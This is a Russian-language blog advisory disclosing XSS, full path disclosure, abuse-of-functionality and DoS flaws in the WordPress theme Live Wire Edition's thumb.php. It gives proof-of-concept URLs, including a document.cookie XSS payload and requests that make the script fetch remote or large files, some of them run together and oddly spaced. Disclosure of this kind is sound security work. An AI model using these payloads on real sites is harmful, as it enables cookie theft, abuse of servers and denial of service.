Уязвимости в теме Live Wire Edition для WordPress
01.02.2011
В декабре, 08.12.2008, я нашел Cross-Site Scripting, Full path disclosure, Abuse of Functionality и Denial of Service уязвимости в теме Live Wire Edition для WordPress. Это коммерческий шаблон для WP от WooThemes. Которые я обнаружил на одном сайте, использующий данный шаблон. Что в ближайшее время сообщу разработчикам.
Ранее я уже писал об уязвимости в различных шаблонах для WP, в частности в 2007 году я писал о XSS в темах Blix и Blix Rus для WordPress.
Подробная информация об уязвимости появится позже. Сначала сообщу разработчикам темы.
08.04.2011
XSS:
http://site/wp-content/themes/livewire-edition/thumb.php?src =% 3Cbody% 20onload = alert (document.cookie)% 3E.jpg
Full path disclosure:
http://site/wp-content/themes/livewire-edition/thumb.php?src=jpghttp://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/ page.png & h = 1 & w = 1111111http: / / site / wp-content / themes / livewire-edition / thumb.php? src = http://site/page.png&h=1111111&w=1http://site/wp-content/ themes / livewire-edition /
А также еще 30 php-скриптов шаблона в папке / livewire-edition / и всех подпапках.
Abuse of Functionality:
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1
DoS:
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1
О подобных AoF и DoS уязвимости я писал в статье Использование сайтов для атак на другие сайты.
Кроме папки / livewire-edition /, данная тема может размещаться в папке / livewire-package / (это пакет, включающий все три темы Live Wire серии).
Уязвимые Live Wire Edition 2.3.1 и предыдущие версии. XSS возможна только в старых версиях шаблона. После моего предупреждения, разработчик исправил Abuse of Functionality, DoS и некоторые FPD, но все еще осталось много неисправленных FPD.
